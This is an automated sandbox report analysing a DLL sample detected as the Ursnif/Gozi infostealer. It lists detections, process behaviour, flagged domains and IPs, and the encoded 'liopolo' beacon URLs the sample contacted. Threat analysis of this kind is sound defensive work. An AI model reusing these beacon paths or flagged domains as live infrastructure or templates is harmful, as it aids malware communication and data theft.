
                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 500413 Sample: 616412739e268.dll Startdate: 12/10/2021 Architecture: WINDOWS Score: 96 31 outlook.com 2->31 47 Multi AV Scanner detection for domain / URL 2->47 49 Found malware configuration 2->49 51 Multi AV Scanner detection for submitted file 2->51 53 Yara detected  Ursnif 2->53 8 loaddll32.exe 1 2->8         started        signatures3 process4 dnsIp5 41 breuranel.website 8->41 43 areuranel.website 8->43 45 11 other IPs or domains 8->45 57 Writes or reads registry keys via WMI 8->57 59 Writes registry values via WMI 8->59 12 rundll32.exe 8->12         started        15 cmd.exe 1 8->15         started        17 rundll32.exe 8->17         started        19 rundll32.exe 8->19         started        signatures6 process7 signatures8 61 System process connects to network (likely due to code injection or exploit) 12->61 63 Writes registry values via WMI 12->63 21 WerFault.exe 23 9 12->21         started        23 rundll32.exe 15->23         started        27 WerFault.exe 9 17->27         started        29 WerFault.exe 2 9 19->29         started        process9 dnsIp10 33 40.97.153.146, 443, 49809, 49860 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 23->33 35 52.97.137.210, 443, 49811 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 23->35 39 11 other IPs or domains 23->39 55 System process connects to network (likely due to code injection or exploit) 23->55 37 192.168.2.1 unknown unknown 27->37 signatures11

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      616412739e268.dll6%VirustotalBrowse
                      616412739e268.dll24%ReversingLabsWin32.Infostealer.Gozi

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      0.2.loaddll32.exe.1370000.0.unpack100%AviraHEUR/AGEN.1108168Download File
                      5.0.rundll32.exe.4970000.0.unpack100%AviraHEUR/AGEN.1108168Download File
                      5.2.rundll32.exe.4970000.0.unpack100%AviraHEUR/AGEN.1108168Download File
                      5.0.rundll32.exe.4970000.1.unpack100%AviraHEUR/AGEN.1108168Download File
                      3.2.rundll32.exe.4cd0000.0.unpack100%AviraHEUR/AGEN.1108168Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      areuranel.website7%VirustotalBrowse
                      breuranel.website7%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                      https://mem.gfx.ms/meversion/?partner=msn&amp;market=en-us&quot;0%Avira URL Cloudsafe
                      https://watson.tel0%VirustotalBrowse
                      https://watson.tel0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      msn.com
                      13.82.28.61
                      truefalse
                        high
                        outlook.com
                        40.97.116.82
                        truefalse
                          high
                          HHN-efz.ms-acdc.office.com
                          52.97.183.162
                          truefalse
                            high
                            FRA-efz.ms-acdc.office.com
                            52.98.207.194
                            truefalse
                              high
                              www.msn.com
                              unknown
                              unknownfalse
                                high
                                www.outlook.com
                                unknown
                                unknownfalse
                                  high
                                  areuranel.website
                                  unknown
                                  unknowntrueunknown
                                  breuranel.website
                                  unknown
                                  unknowntrueunknown
                                  outlook.office365.com
                                  unknown
                                  unknownfalse
                                    high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    https://outlook.com/signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jrefalse
                                      high
                                      https://outlook.com/signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jrefalse
                                        high
                                        https://msn.com/mail/liopolo/NtZggqxIX2EF9w_2/BavTQ0jHk8z72E0/mrA_2BNo5fGf18qS53/GIhA4FNpc/qIQbJVkxLHpIx3LzJcYF/3uQz3PgIC5Pjndy7vBH/i_2FOaoK6pUzqTQ2mVu3pq/cfXt8VkJHx4pF/9i2ySYSz/e6Fwjd_2BYZ5QEKc2Ev8w_2/FX9nTU6mpV/BkgebLJcyW_2BOHak/X7QoD77ir05E/ic.jrefalse
                                          high
                                          https://outlook.office365.com/signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jrefalse
                                            high
                                            https://msn.com/mail/liopolo/5hHdOh6aVGIiN/xm3v7_2B/EkShunhzAo7MsZ9CmkqFWtX/3z_2Bns4ON/91CWMsZkh9K0L_2FK/DGWBtSEwajEJ/0TtpREbudd5/QgJK102N2T9j48/a7_2B8h2NmEQ_2FO6HINr/eS5x2dWmrnxEuUas/E6VYZyoESNredc4/JUFmKkMiSye_2BBKeH/JexZCfmhU/vSKjW_2B8KOY/RYzBQt1.jrefalse
                                              high
                                              https://www.outlook.com/signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jrefalse
                                                high
                                                https://www.outlook.com/signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jrefalse
                                                  high
                                                  https://outlook.office365.com/signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jrefalse
                                                    high

                                                    URLs from Memory and Binaries

                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    https://msn.com/floaddll32.exe, 00000000.00000003.917168598.0000000001701000.00000004.00000001.sdmpfalse
                                                      high
                                                      https://www.msn.com/mail/liopolo/31Pla_2BCXtei/1R_2BY6O/xV8Y0PePoExsKvdRsArLjMT/0HY9ewGl4d/RTh7V4sy0loaddll32.exe, 00000000.00000003.917087190.00000000016FB000.00000004.00000001.sdmpfalse
                                                        high
                                                        https://wwtlook.office365.com/loaddll32.exe, 00000000.00000002.1183944098.000000000164B000.00000004.00000020.sdmpfalse
                                                          high
                                                          https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&amp;ver=%272.1%27&amp;aloaddll32.exe, 00000000.00000003.1093653246.0000000001716000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.1108208109.00000000058BC000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmpfalse
                                                            high
                                                            https://blogs.msn.com/loaddll32.exe, 00000000.00000003.916793229.0000000003BB8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931542596.00000000058BC000.00000004.00000040.sdmpfalse
                                                              high
                                                              https://www.outlook.com/signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7Vloaddll32.exe, 00000000.00000003.1181590460.00000000016A1000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.1184778471.0000000001722000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1181707542.0000000001715000.00000004.00000001.sdmpfalse
                                                                high
                                                                https://deff.nelreports.net/api/report?cat=msnloaddll32.exe, 00000000.00000003.1005943661.000000000169F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1093682966.000000000170D000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.931542596.00000000058BC000.00000004.00000040.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://www.msn.com/en-us//api/modules/fetch&quot;loaddll32.exe, 00000000.00000003.1093773062.0000000003BBB000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.1093653246.0000000001716000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.917087190.00000000016FB000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.1108259014.00000000058BB000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmpfalse
                                                                  high
                                                                  https://web.vortex.data.msn.com/collect/v1/t.girundll32.exe, 00000003.00000003.930983342.00000000058B8000.00000004.00000040.sdmpfalse
                                                                    high
                                                                    http://ogp.me/ns/fb#loaddll32.exe, 00000000.00000003.1093713289.0000000001713000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.1108259014.00000000058BB000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmpfalse
                                                                      high
                                                                      https://outlook.office365.com/2Hloaddll32.exe, 00000000.00000003.1005981116.00000000016C2000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        https://msn.com/loaddll32.exe, 00000000.00000002.1183944098.000000000164B000.00000004.00000020.sdmpfalse
                                                                          high
                                                                          https://msn.com/Dloaddll32.exe, 00000000.00000002.1183944098.000000000164B000.00000004.00000020.sdmpfalse
                                                                            high
                                                                            https://www.msn.com/?refurl=%2fmail%2fliopolo%2f31Pla_2BCXtei%2f1R_2BY6O%2fxV8Y0PePoExsKvdRsArLjMT%2loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmpfalse
                                                                              high
                                                                              https://outlook.office365.com/signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/Boloaddll32.exe, 00000000.00000003.1005814049.000000000170B000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1005878880.0000000001706000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1005753123.000000000170C000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                https://outlook.office365.com/loaddll32.exe, 00000000.00000003.1005981116.00000000016C2000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  https://mem.gfx.ms/meversion/?partner=msn&amp;market=en-us&quot;loaddll32.exe, 00000000.00000003.1093653246.0000000001716000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.1093739436.0000000003BBC000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.1108208109.00000000058BC000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://www.msn.com/?refurl=%2fmail%2fliopolo%2f5hHdOh6aVGIiN%2fxm3v7_2B%2fEkShunhzAo7MsZ9CmkqFWtX%2loaddll32.exe, 00000000.00000003.1093653246.0000000001716000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    https://www.outlook.com/signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXaloaddll32.exe, 00000000.00000003.1005943661.000000000169F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1005753123.000000000170C000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      http://ogp.me/ns#loaddll32.exe, 00000000.00000003.1093713289.0000000001713000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.1108259014.00000000058BB000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmpfalse
                                                                                        high
                                                                                        https://outlook.office365.com/signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusloaddll32.exe, 00000000.00000003.1181590460.00000000016A1000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1181707542.0000000001715000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.1183944098.000000000164B000.00000004.00000020.sdmpfalse
                                                                                          high
                                                                                          https://www.msn.com/?refurl=%2fmail%2fliopolo%2fNtZggqxIX2EF9w_2%2fBavTQ0jHk8z72E0%2fmrA_2BNo5fGf18qrundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmpfalse
                                                                                            high
                                                                                            https://outlook.com/signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYloaddll32.exe, 00000000.00000003.1181590460.00000000016A1000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              https://outlook.office365.com/9Hloaddll32.exe, 00000000.00000002.1184438243.00000000016C2000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                https://watson.telWerFault.exe, 0000000C.00000002.928906655.00000000048CC000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000002.929018615.0000000004983000.00000004.00000001.sdmpfalse
                                                                                                • 0%, Virustotal, Browse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://www.msn.com/?refurl=%2fmail%2fliopolo%2fQoeEw7znNY9KuZLPv%2fPhlDvAFg0Bnn%2fnVx6DnTynJS%2fJqerundll32.exe, 00000003.00000003.1108208109.00000000058BC000.00000004.00000040.sdmpfalse
                                                                                                  high

                                                                                                  Contacted IPs

                                                                                                  • No. of IPs < 25%
                                                                                                  • 25% < No. of IPs < 50%
                                                                                                  • 50% < No. of IPs < 75%
                                                                                                  • 75% < No. of IPs

                                                                                                  Public

                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                  52.98.207.194
                                                                                                  FRA-efz.ms-acdc.office.comUnited States
                                                                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                  52.97.218.66
                                                                                                  unknownUnited States
                                                                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                                                                  52.97.218.82
                                                                                                  unknownUnited States
                                                                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                  40.101.124.226
                                                                                                  unknownUnited States
                                                                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                  40.97.153.146
                                                                                                  unknownUnited States
                                                                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                                                                  13.82.28.61
                                                                                                  msn.comUnited States
                                                                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                  52.97.137.210
                                                                                                  unknownUnited States
                                                                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                                                                  40.97.116.82
                                                                                                  outlook.comUnited States
                                                                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                  52.97.183.162
                                                                                                  HHN-efz.ms-acdc.office.comUnited States
                                                                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse

                                                                                                  Private

                                                                                                  IP
                                                                                                  192.168.2.1

                                                                                                  General Information

                                                                                                  Joe Sandbox Version:33.0.0 White Diamond
                                                                                                  Analysis ID:500413
                                                                                                  Start date:12.10.2021
                                                                                                  Start time:00:35:10
                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                  Overall analysis duration:0h 11m 23s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:light
                                                                                                  Sample file name:616412739e268.dll
                                                                                                  Cookbook file name:default.jbs
                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                  Number of analysed new started processes analysed:27
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:0
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • HDC enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
                                                                                                  Detection:MAL
                                                                                                  Classification:mal96.troj.evad.winDLL@14/12@24/10
                                                                                                  EGA Information:Failed
                                                                                                  HDC Information:
                                                                                                  • Successful, ratio: 18% (good quality ratio 16.9%)
                                                                                                  • Quality average: 77.6%
                                                                                                  • Quality standard deviation: 30%
                                                                                                  HCA Information:
                                                                                                  • Successful, ratio: 68%
                                                                                                  • Number of executed functions: 0
                                                                                                  • Number of non-executed functions: 0
                                                                                                  Cookbook Comments:
                                                                                                  • Adjust boot time
                                                                                                  • Enable AMSI
                                                                                                  • Found application associated with file extension: .dll
                                                                                                  • Override analysis time to 240s for rundll32
                                                                                                  Warnings:
                                                                                                  Show All
                                                                                                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                  • TCP Packets have been reduced to 100
                                                                                                  • Excluded IPs from analysis (whitelisted): 23.203.141.148, 93.184.221.240, 8.247.248.223, 8.247.248.249, 8.247.244.249, 20.82.210.154, 13.89.179.12, 204.79.197.203, 52.168.117.173, 20.189.173.22, 2.20.178.24, 2.20.178.33, 20.54.110.249, 52.251.79.25, 40.112.88.60, 52.184.81.210
                                                                                                  • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, fg.download.windowsupdate.com.c.footprint.net, onedsblobprdwus17.westus.cloudapp.azure.com, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, onedsblobprdcus17.centralus.cloudapp.azure.com, a1449.dscg2.akamai.net, wu.azureedge.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, wu-shim.trafficmanager.net, a-0003.a-msedge.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, www-msn-com.a-0003.a-msedge.net, iris-de-prod-azsc-eas-b.eastasia.cloudapp.azure.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                  Simulations

                                                                                                  Behavior and APIs

                                                                                                  TimeTypeDescription
                                                                                                  00:37:39API Interceptor8x Sleep call for process: rundll32.exe modified
                                                                                                  00:37:49API Interceptor8x Sleep call for process: loaddll32.exe modified
                                                                                                  00:37:57API Interceptor3x Sleep call for process: WerFault.exe modified

                                                                                                  Joe Sandbox View / Context

                                                                                                  IPs

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                  40.101.124.226S5.exeGet hashmaliciousBrowse
                                                                                                    40.97.153.146m87xfb63XU.dllGet hashmaliciousBrowse
                                                                                                      test1.dllGet hashmaliciousBrowse
                                                                                                        7.dllGet hashmaliciousBrowse
                                                                                                          nT5pUwoJSS.dllGet hashmaliciousBrowse
                                                                                                            5instructio.exeGet hashmaliciousBrowse
                                                                                                              .exeGet hashmaliciousBrowse
                                                                                                                61Documen.exeGet hashmaliciousBrowse
                                                                                                                  65document.exeGet hashmaliciousBrowse
                                                                                                                    29mail98@vip.son.exeGet hashmaliciousBrowse
                                                                                                                      57document.exeGet hashmaliciousBrowse
                                                                                                                        13.82.28.6145DOC00111738011537818635391-pdf.exeGet hashmaliciousBrowse
                                                                                                                        • msn.com/

                                                                                                                        Domains

                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                        outlook.comP2AN3Yrtnz.exeGet hashmaliciousBrowse
                                                                                                                        • 40.93.212.0
                                                                                                                        Hm7d40tE44.exeGet hashmaliciousBrowse
                                                                                                                        • 104.47.53.36
                                                                                                                        SecuriteInfo.com.W32.AIDetect.malware2.21009.exeGet hashmaliciousBrowse
                                                                                                                        • 104.47.53.36
                                                                                                                        in7BcpKNoa.exeGet hashmaliciousBrowse
                                                                                                                        • 40.93.212.0
                                                                                                                        aXNdDIO708.exeGet hashmaliciousBrowse
                                                                                                                        • 104.47.53.36
                                                                                                                        vhPaw5lCuv.exeGet hashmaliciousBrowse
                                                                                                                        • 40.93.212.0
                                                                                                                        5sTWnI5RoC.exeGet hashmaliciousBrowse
                                                                                                                        • 40.93.207.0
                                                                                                                        57wF9hu0V5.exeGet hashmaliciousBrowse
                                                                                                                        • 40.93.207.0
                                                                                                                        7zxmUw3Ml1.exeGet hashmaliciousBrowse
                                                                                                                        • 104.47.53.36
                                                                                                                        Nh1UI4PFGW.exeGet hashmaliciousBrowse
                                                                                                                        • 52.101.24.0
                                                                                                                        rEYF2xcbGR.exeGet hashmaliciousBrowse
                                                                                                                        • 40.93.207.1
                                                                                                                        G2Shy4flZe.exeGet hashmaliciousBrowse
                                                                                                                        • 40.93.207.1
                                                                                                                        2nqVnWlyLp.exeGet hashmaliciousBrowse
                                                                                                                        • 52.101.24.0

                                                                                                                        ASN

                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                        MICROSOFT-CORP-MSN-AS-BLOCKUSm87xfb63XU.dllGet hashmaliciousBrowse
                                                                                                                        • 40.101.60.226
                                                                                                                        m87xfb63XU.dllGet hashmaliciousBrowse
                                                                                                                        • 52.97.151.66
                                                                                                                        6yDD19jMIu.dllGet hashmaliciousBrowse
                                                                                                                        • 13.82.28.61
                                                                                                                        6yDD19jMIu.dllGet hashmaliciousBrowse
                                                                                                                        • 13.82.28.61
                                                                                                                        B6VQd36tt6.dllGet hashmaliciousBrowse
                                                                                                                        • 13.82.28.61
                                                                                                                        B6VQd36tt6.dllGet hashmaliciousBrowse
                                                                                                                        • 52.97.183.162
                                                                                                                        P2AN3Yrtnz.exeGet hashmaliciousBrowse
                                                                                                                        • 40.93.212.0
                                                                                                                        b3astmode.x86Get hashmaliciousBrowse
                                                                                                                        • 72.154.237.78
                                                                                                                        b3astmode.arm7Get hashmaliciousBrowse
                                                                                                                        • 20.153.181.154
                                                                                                                        b3astmode.arm7-20211011-1850Get hashmaliciousBrowse
                                                                                                                        • 20.63.129.213
                                                                                                                        TNIZtb3HS3.exeGet hashmaliciousBrowse
                                                                                                                        • 20.42.65.92
                                                                                                                        PROFORMA INVOICE -PI6120..htmlGet hashmaliciousBrowse
                                                                                                                        • 40.101.62.34
                                                                                                                        setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                                                                        • 52.168.117.173
                                                                                                                        ntpclientGet hashmaliciousBrowse
                                                                                                                        • 21.215.78.72
                                                                                                                        2021catalog-selected products.xlsmGet hashmaliciousBrowse
                                                                                                                        • 13.92.100.208
                                                                                                                        K6E9636KoqGet hashmaliciousBrowse
                                                                                                                        • 159.27.209.248
                                                                                                                        setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                                                                        • 20.42.73.29
                                                                                                                        Hm7d40tE44.exeGet hashmaliciousBrowse
                                                                                                                        • 104.47.53.36
                                                                                                                        mixsix_20211008-150045.exeGet hashmaliciousBrowse
                                                                                                                        • 20.189.173.22
                                                                                                                        SecuriteInfo.com.W32.AIDetect.malware2.21009.exeGet hashmaliciousBrowse
                                                                                                                        • 104.47.53.36
                                                                                                                        MICROSOFT-CORP-MSN-AS-BLOCKUSm87xfb63XU.dllGet hashmaliciousBrowse
                                                                                                                        • 40.101.60.226
                                                                                                                        m87xfb63XU.dllGet hashmaliciousBrowse
                                                                                                                        • 52.97.151.66
                                                                                                                        6yDD19jMIu.dllGet hashmaliciousBrowse
                                                                                                                        • 13.82.28.61
                                                                                                                        6yDD19jMIu.dllGet hashmaliciousBrowse
                                                                                                                        • 13.82.28.61
                                                                                                                        B6VQd36tt6.dllGet hashmaliciousBrowse
                                                                                                                        • 13.82.28.61
                                                                                                                        B6VQd36tt6.dllGet hashmaliciousBrowse
                                                                                                                        • 52.97.183.162
                                                                                                                        P2AN3Yrtnz.exeGet hashmaliciousBrowse
                                                                                                                        • 40.93.212.0
                                                                                                                        b3astmode.x86Get hashmaliciousBrowse
                                                                                                                        • 72.154.237.78
                                                                                                                        b3astmode.arm7Get hashmaliciousBrowse
                                                                                                                        • 20.153.181.154
                                                                                                                        b3astmode.arm7-20211011-1850Get hashmaliciousBrowse
                                                                                                                        • 20.63.129.213
                                                                                                                        TNIZtb3HS3.exeGet hashmaliciousBrowse
                                                                                                                        • 20.42.65.92
                                                                                                                        PROFORMA INVOICE -PI6120..htmlGet hashmaliciousBrowse
                                                                                                                        • 40.101.62.34
                                                                                                                        setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                                                                        • 52.168.117.173
                                                                                                                        ntpclientGet hashmaliciousBrowse
                                                                                                                        • 21.215.78.72
                                                                                                                        2021catalog-selected products.xlsmGet hashmaliciousBrowse
                                                                                                                        • 13.92.100.208
                                                                                                                        K6E9636KoqGet hashmaliciousBrowse
                                                                                                                        • 159.27.209.248
                                                                                                                        setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                                                                        • 20.42.73.29
                                                                                                                        Hm7d40tE44.exeGet hashmaliciousBrowse
                                                                                                                        • 104.47.53.36
                                                                                                                        mixsix_20211008-150045.exeGet hashmaliciousBrowse
                                                                                                                        • 20.189.173.22
                                                                                                                        SecuriteInfo.com.W32.AIDetect.malware2.21009.exeGet hashmaliciousBrowse
                                                                                                                        • 104.47.53.36

                                                                                                                        JA3 Fingerprints

                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                        ce5f3254611a8c095a3d821d44539877m87xfb63XU.dllGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        m87xfb63XU.dllGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        6yDD19jMIu.dllGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
                                                                                                                        • 40.101.124.226
                                                                                                                        • 40.97.153.146
                                                                                                                        • 52.98.207.194
                                                                                                                        • 52.97.218.66
                                                                                                                        • 13.82.28.61
                                                                                                                        • 52.97.137.210
                                                                                                                        • 40.97.116.82
                                                                                                                        • 52.97.183.162
                                                                                                                        6yDD19jMIu.dllGet hashmaliciousBrowse
                                                                                                                        • 52.97.218.82
